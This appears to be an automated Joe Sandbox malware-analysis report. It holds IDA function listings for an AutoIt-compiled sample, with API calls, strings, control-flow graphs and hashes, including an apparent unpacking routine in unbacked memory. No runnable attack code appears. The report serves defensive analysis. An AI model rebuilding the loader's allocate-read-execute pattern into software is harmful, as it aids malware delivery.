                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                        • String ID: @
                                                                                        • API String ID: 3896587723-2766056989
                                                                                        • Opcode ID: e8d065f2e723d0934598a2f3f6c6ee3031a26d995f33bf134eb629183ac6f41c
                                                                                        • Instruction ID: 8f5e8640ff4de62e71ae314203368703c587ab53be657eaf184184773d38fe99
                                                                                        • Opcode Fuzzy Hash: e8d065f2e723d0934598a2f3f6c6ee3031a26d995f33bf134eb629183ac6f41c
                                                                                        • Instruction Fuzzy Hash: 87220271D0460A9BEF299E68DC45BFD7B61EB44324F284229E921DB2D1C7398DC0F791
                                                                                        Function 00F2FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _wcscpy.LIBCMT ref: 00F2FA96
                                                                                        • _wcschr.LIBCMT ref: 00F2FAA4
                                                                                        • _wcscpy.LIBCMT ref: 00F2FABB
                                                                                        • _wcscat.LIBCMT ref: 00F2FACA
                                                                                        • _wcscat.LIBCMT ref: 00F2FAE8
                                                                                        • _wcscpy.LIBCMT ref: 00F2FB09
                                                                                        • __wsplitpath.LIBCMT ref: 00F2FBE6
                                                                                        • _wcscpy.LIBCMT ref: 00F2FC0B
                                                                                        • _wcscpy.LIBCMT ref: 00F2FC1D
                                                                                        • _wcscpy.LIBCMT ref: 00F2FC32
                                                                                        • _wcscat.LIBCMT ref: 00F2FC47
                                                                                        • _wcscat.LIBCMT ref: 00F2FC59
                                                                                        • _wcscat.LIBCMT ref: 00F2FC6E
                                                                                          • Part of subcall function 00F2BFA4: _wcscmp.LIBCMT ref: 00F2C03E
                                                                                          • Part of subcall function 00F2BFA4: __wsplitpath.LIBCMT ref: 00F2C083
                                                                                          • Part of subcall function 00F2BFA4: _wcscpy.LIBCMT ref: 00F2C096
                                                                                          • Part of subcall function 00F2BFA4: _wcscat.LIBCMT ref: 00F2C0A9
                                                                                          • Part of subcall function 00F2BFA4: __wsplitpath.LIBCMT ref: 00F2C0CE
                                                                                          • Part of subcall function 00F2BFA4: _wcscat.LIBCMT ref: 00F2C0E4
                                                                                          • Part of subcall function 00F2BFA4: _wcscat.LIBCMT ref: 00F2C0F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                        • API String ID: 2955681530-2806939583
                                                                                        • Opcode ID: f82366ed21f8070d3a0a540def0ddd9e013749e3f9a679c60683869660629b4b
                                                                                        • Instruction ID: baf4f4b0768b468a7fee5226658a94feb5f8d358c629f969b754c9ff9270dc1b
                                                                                        • Opcode Fuzzy Hash: f82366ed21f8070d3a0a540def0ddd9e013749e3f9a679c60683869660629b4b
                                                                                        • Instruction Fuzzy Hash: C691C072604345AFDB20EB50D851F9FB3E8BF94310F004829F95997292DB34FA48EB92
                                                                                        Function 00F2BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00F2BDB4: __time64.LIBCMT ref: 00F2BDBE
                                                                                          • Part of subcall function 00EE4517: _fseek.LIBCMT ref: 00EE452F
                                                                                        • __wsplitpath.LIBCMT ref: 00F2C083
                                                                                          • Part of subcall function 00F01DFC: __wsplitpath_helper.LIBCMT ref: 00F01E3C
                                                                                        • _wcscpy.LIBCMT ref: 00F2C096
                                                                                        • _wcscat.LIBCMT ref: 00F2C0A9
                                                                                        • __wsplitpath.LIBCMT ref: 00F2C0CE
                                                                                        • _wcscat.LIBCMT ref: 00F2C0E4
                                                                                        • _wcscat.LIBCMT ref: 00F2C0F7
                                                                                        • _wcscmp.LIBCMT ref: 00F2C03E
                                                                                          • Part of subcall function 00F2C56D: _wcscmp.LIBCMT ref: 00F2C65D
                                                                                          • Part of subcall function 00F2C56D: _wcscmp.LIBCMT ref: 00F2C670
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F2C2A1
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F2C338
                                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F2C34E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F2C35F
                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F2C371
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                        • String ID: p1#v`K$v
                                                                                        • API String ID: 2378138488-1068180069
                                                                                        • Opcode ID: a67d11e677d90c9716c646892f808c8a253336910ef9663ff533098b555c923b
                                                                                        • Instruction ID: b87084a4d23419fc4fec5f117dabfba17ff0c34527287f5ca9b01f1c9a2d62c6
                                                                                        • Opcode Fuzzy Hash: a67d11e677d90c9716c646892f808c8a253336910ef9663ff533098b555c923b
                                                                                        • Instruction Fuzzy Hash: D1C13CB1E00229ABDF11DF95DC81EDEB7BDAF48310F1040AAF609E6191DB749A449FA1
                                                                                        Function 00EE3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EE3F86
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00EE3FB0
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE3FC1
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00EE3FDE
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE3FEE
                                                                                        • LoadIconW.USER32(000000A9), ref: 00EE4004
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE4013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-1005189915
                                                                                        • Opcode ID: afe6643a0925959799f44caa46849802e47c732d5f39ebdcfde868f657948d3b
                                                                                        • Instruction ID: cea6760905f5f807eb74f28a377a98114b22285810a65322a8c7f2bcef32060e
                                                                                        • Opcode Fuzzy Hash: afe6643a0925959799f44caa46849802e47c732d5f39ebdcfde868f657948d3b
                                                                                        • Instruction Fuzzy Hash: A521B2B5E0021CAFDB409FA5E889B8DBBB4FB09700F05821AF625A62A0D7B54544AF91
                                                                                        Function 00EE3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 961 ee3742-ee3762 963 ee3764-ee3767 961->963 964 ee37c2-ee37c4 961->964 966 ee37c8 963->966 967 ee3769-ee3770 963->967 964->963 965 ee37c6 964->965 968 ee37ab-ee37b3 DefWindowProcW 965->968 969 ee37ce-ee37d1 966->969 970 f51e00-f51e2e call ee2ff6 call efe312 966->970 971 ee382c-ee3834 PostQuitMessage 967->971 972 ee3776-ee377b 967->972 976 ee37b9-ee37bf 968->976 977 ee37f6-ee381d SetTimer RegisterWindowMessageW 969->977 978 ee37d3-ee37d4 969->978 1004 f51e33-f51e3a 970->1004 975 ee37f2-ee37f4 971->975 973 f51e88-f51e9c call f24ddd 972->973 974 ee3781-ee3783 972->974 973->975 998 f51ea2 973->998 981 ee3789-ee378e 974->981 982 ee3836-ee3840 call efeb83 974->982 975->976 977->975 983 ee381f-ee382a CreatePopupMenu 977->983 985 ee37da-ee37ed KillTimer call ee3847 call ee390f 978->985 986 f51da3-f51da6 978->986 988 f51e6d-f51e74 981->988 989 ee3794-ee3799 981->989 999 ee3845 982->999 983->975 985->975 992 f51ddc-f51dfb MoveWindow 986->992 993 f51da8-f51daa 986->993 988->968 1003 f51e7a-f51e83 call f1a5f3 988->1003 996 ee379f-ee37a5 989->996 997 f51e58-f51e68 call f255bd 989->997 992->975 1000 f51dac-f51daf 993->1000 1001 f51dcb-f51dd7 SetFocus 993->1001 996->968 996->1004 997->975 998->968 999->975 1000->996 1005 f51db5-f51dc6 call ee2ff6 1000->1005 1001->975 1003->968 1004->968 1010 f51e40-f51e53 call ee3847 call ee4ffc 1004->1010 1005->975 1010->968
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00EE37B3
                                                                                        • KillTimer.USER32(?,00000001), ref: 00EE37DD
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE3800
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE380B
                                                                                        • CreatePopupMenu.USER32 ref: 00EE381F
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00EE382E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303
                                                                                        • Opcode ID: aabad77274f421aca2575128acaf4f6f4b6daa998c47087622a9fb064f7989bd
                                                                                        • Instruction ID: c6c3ca5221e698429b00f8c9a4ab4290bbdd75fa71f3b62a7f3290adbb764d58
                                                                                        • Opcode Fuzzy Hash: aabad77274f421aca2575128acaf4f6f4b6daa998c47087622a9fb064f7989bd
                                                                                        • Instruction Fuzzy Hash: 834126F560419DABDB145F3ADC4EBBB3A95FB01301F052116FA12F31A1CB61AE40B761
                                                                                        Function 00EE3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EE3E79
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00EE3E88
                                                                                        • LoadIconW.USER32(00000063), ref: 00EE3E9E
                                                                                        • LoadIconW.USER32(000000A4), ref: 00EE3EB0
                                                                                        • LoadIconW.USER32(000000A2), ref: 00EE3EC2
                                                                                          • Part of subcall function 00EE4024: LoadImageW.USER32(00EE0000,00000063,00000001,00000010,00000010,00000000), ref: 00EE4048
                                                                                        • RegisterClassExW.USER32(?), ref: 00EE3F30
                                                                                          • Part of subcall function 00EE3F53: GetSysColorBrush.USER32(0000000F), ref: 00EE3F86
                                                                                          • Part of subcall function 00EE3F53: RegisterClassExW.USER32(00000030), ref: 00EE3FB0
                                                                                          • Part of subcall function 00EE3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE3FC1
                                                                                          • Part of subcall function 00EE3F53: InitCommonControlsEx.COMCTL32(?), ref: 00EE3FDE
                                                                                          • Part of subcall function 00EE3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE3FEE
                                                                                          • Part of subcall function 00EE3F53: LoadIconW.USER32(000000A9), ref: 00EE4004
                                                                                          • Part of subcall function 00EE3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE4013
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: 6a6f9fa243227a4e70b017983a474b48698d7062ecc35eb4713c93709bb9cd37
                                                                                        • Instruction ID: 56d5c0d24114172f8e32ef4224a479f440c17f13ac9222ed4cbdbf1605c8e1b7
                                                                                        • Opcode Fuzzy Hash: 6a6f9fa243227a4e70b017983a474b48698d7062ecc35eb4713c93709bb9cd37
                                                                                        • Instruction Fuzzy Hash: 762153F0E0431CABDB10DFA9EC49A99BBF5FB49310F00811AE215A32A0D7754540AF91
                                                                                        Function 010582D8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1025 10582d8-1058386 call 1055cd8 1028 105838d-10583b3 call 10591e8 CreateFileW 1025->1028 1031 10583b5 1028->1031 1032 10583ba-10583ca 1028->1032 1033 1058505-1058509 1031->1033 1037 10583d1-10583eb VirtualAlloc 1032->1037 1038 10583cc 1032->1038 1034 105854b-105854e 1033->1034 1035 105850b-105850f 1033->1035 1039 1058551-1058558 1034->1039 1040 1058511-1058514 1035->1040 1041 105851b-105851f 1035->1041 1042 10583f2-1058409 ReadFile 1037->1042 1043 10583ed 1037->1043 1038->1033 1044 10585ad-10585c2 1039->1044 1045 105855a-1058565 1039->1045 1040->1041 1046 1058521-105852b 1041->1046 1047 105852f-1058533 1041->1047 1050 1058410-1058450 VirtualAlloc 1042->1050 1051 105840b 1042->1051 1043->1033 1054 10585c4-10585cf VirtualFree 1044->1054 1055 10585d2-10585da 1044->1055 1052 1058567 1045->1052 1053 1058569-1058575 1045->1053 1046->1047 1048 1058535-105853f 1047->1048 1049 1058543 1047->1049 1048->1049 1049->1034 1056 1058457-1058472 call 1059438 1050->1056 1057 1058452 1050->1057 1051->1033 1052->1044 1058 1058577-1058587 1053->1058 1059 1058589-1058595 1053->1059 1054->1055 1065 105847d-1058487 1056->1065 1057->1033 1061 10585ab 1058->1061 1062 1058597-10585a0 1059->1062 1063 10585a2-10585a8 1059->1063 1061->1039 1062->1061 1063->1061 1066 1058489-10584b8 call 1059438 1065->1066 1067 10584ba-10584ce call 1059248 1065->1067 1066->1065 1072 10584d0 1067->1072 1073 10584d2-10584d6 1067->1073 1072->1033 1075 10584e2-10584e6 1073->1075 1076 10584d8-10584dc CloseHandle 1073->1076 1077 10584f6-10584ff 1075->1077 1078 10584e8-10584f3 VirtualFree 1075->1078 1076->1075 1077->1028 1077->1033 1078->1077
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010583A9
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010585CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                        • Instruction ID: 4001f3fdb4a629d02455fbefce47ec1ba43088aa35ae55fde0f78f4c00b38987
                                                                                        • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                        • Instruction Fuzzy Hash: 6AA11970E00209EBDB54CFA5C888BEEBBB5FF48305F208599E941BB281D7759A41CF55
                                                                                        Function 00EE49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1134 ee49fb-ee4a25 call eebcce RegOpenKeyExW 1137 ee4a2b-ee4a2f 1134->1137 1138 f541cc-f541e3 RegQueryValueExW 1134->1138 1139 f541e5-f54222 call eff4ea call ee47b7 RegQueryValueExW 1138->1139 1140 f54246-f5424f RegCloseKey 1138->1140 1145 f54224-f5423b call ee6a63 1139->1145 1146 f5423d-f54245 call ee47e2 1139->1146 1145->1146 1146->1140
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00EE4A1D
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F541DB
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F5421A
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F54249
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpen
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                        • API String ID: 1586453840-614718249
                                                                                        • Opcode ID: 2ecd6f1ed74d7ed548217384453b16da43d0ba8c7ae2c8011971dda1c59b6685
                                                                                        • Instruction ID: b2d02a61ec9f8963cd6b68164ac6a8f6784498af1d78492605c77d4a33cf1145
                                                                                        • Opcode Fuzzy Hash: 2ecd6f1ed74d7ed548217384453b16da43d0ba8c7ae2c8011971dda1c59b6685
                                                                                        • Instruction Fuzzy Hash: B2116D71A0010CBEEB01ABA4CD86DBF7BBCEF04354F105069F516E2191EA70AE45EB50
                                                                                        Function 00EE36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1161 ee36b8-ee3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EE36E6
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EE3707
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00EE3AA3,?), ref: 00EE371B
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,00EE3AA3,?), ref: 00EE3724
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: 1960627a7c26f3eb29baee9f7dcb6dda661f612727e687b99d619a21ab766492
                                                                                        • Instruction ID: 349b5f598721ba840373921f0b28ef02ef7af583baabbe0958a902a43484a0e4
                                                                                        • Opcode Fuzzy Hash: 1960627a7c26f3eb29baee9f7dcb6dda661f612727e687b99d619a21ab766492
                                                                                        • Instruction Fuzzy Hash: 80F0DAB1A402E87AE7315757AC08E673E7DE7C7F60F02801FFA09A21A1C5650895EAB1
                                                                                        Function 01058088 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1266 1058088-10581d0 call 1055cd8 call 1057f78 CreateFileW 1273 10581d7-10581e7 1266->1273 1274 10581d2 1266->1274 1277 10581ee-1058208 VirtualAlloc 1273->1277 1278 10581e9 1273->1278 1275 1058287-105828c 1274->1275 1279 105820c-1058223 ReadFile 1277->1279 1280 105820a 1277->1280 1278->1275 1281 1058225 1279->1281 1282 1058227-1058261 call 1057fb8 call 1056f78 1279->1282 1280->1275 1281->1275 1287 1058263-1058278 call 1058008 1282->1287 1288 105827d-1058285 ExitProcess 1282->1288 1287->1288 1288->1275
                                                                                        APIs
                                                                                          • Part of subcall function 01057F78: Sleep.KERNELBASE(000001F4), ref: 01057F89
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010581C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6
                                                                                        • API String ID: 2694422964-3665809092
                                                                                        • Opcode ID: ec41e43490c183e320d94f9895a2e132943fb27c6d4df2e25e4c6a212d8a34c3
                                                                                        • Instruction ID: aa961273c33358362841cdedaa66fca96b085004123730e1663c15a043978ce4
                                                                                        • Opcode Fuzzy Hash: ec41e43490c183e320d94f9895a2e132943fb27c6d4df2e25e4c6a212d8a34c3
                                                                                        • Instruction Fuzzy Hash: 07617070D04288DAEF11D7B8D848BEFBFB49F15304F048199EA987B2C1C7B90A49CB65
                                                                                        Function 00EE4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1290 ee4139-ee4160 call ee41a9 1293 ee4166-ee4174 call ee41a9 1290->1293 1294 f53489-f53499 call f2c396 1290->1294 1293->1294 1301 ee417a-ee4180 1293->1301 1297 f5349e-f534a0 1294->1297 1299 f534a2-f534a5 call ee4252 1297->1299 1300 f534bf-f53507 call eff4ea 1297->1300 1305 f534aa-f534b9 call f26b49 1299->1305 1310 f53509-f53526 call ee496c 1300->1310 1311 f53528 1300->1311 1304 ee4186-ee41a6 call eec833 1301->1304 1301->1305 1305->1300 1313 f5352a-f5353d 1310->1313 1311->1313 1315 f536b4-f536b7 call f01c9d 1313->1315 1316 f53543 1313->1316 1321 f536bc-f536c5 call ee4252 1315->1321 1318 f5354a-f5354d call ee4f30 1316->1318 1322 f53552-f53574 call eebbfc call f29cab 1318->1322 1326 f536c7-f536d7 call ee4f11 call efd8f5 1321->1326 1333 f53576-f53583 1322->1333 1334 f53588-f53592 call f29c95 1322->1334 1340 f536dc-f5370c call f225b5 call eff55e call f01c9d call ee4252 1326->1340 1336 f5367b-f5368b call eeba85 1333->1336 1342 f53594-f535a7 1334->1342 1343 f535ac-f535b6 call f29c7f 1334->1343 1336->1322 1345 f53691-f5369b call ee4dd9 1336->1345 1340->1326 1342->1336 1350 f535b8-f535c5 1343->1350 1351 f535ca-f535d4 call efd90c 1343->1351 1353 f536a0-f536ae 1345->1353 1350->1336 1351->1336 1358 f535da-f535f2 call f22551 1351->1358 1353->1315 1353->1318 1364 f53615-f53618 1358->1364 1365 f535f4-f53613 call eece19 call eecb37 1358->1365 1366 f53646-f53649 1364->1366 1367 f5361a-f53635 call eece19 call efc2a5 call eecb37 1364->1367 1390 f53636-f53644 call eebbfc 1365->1390 1371 f53669-f5366c call f29c12 1366->1371 1372 f5364b-f53654 call f22472 1366->1372 1367->1390 1377 f53671-f5367a call eff55e 1371->1377 1372->1340 1383 f5365a-f53664 call eff55e 1372->1383 1377->1336 1383->1322 1390->1377
                                                                                        APIs
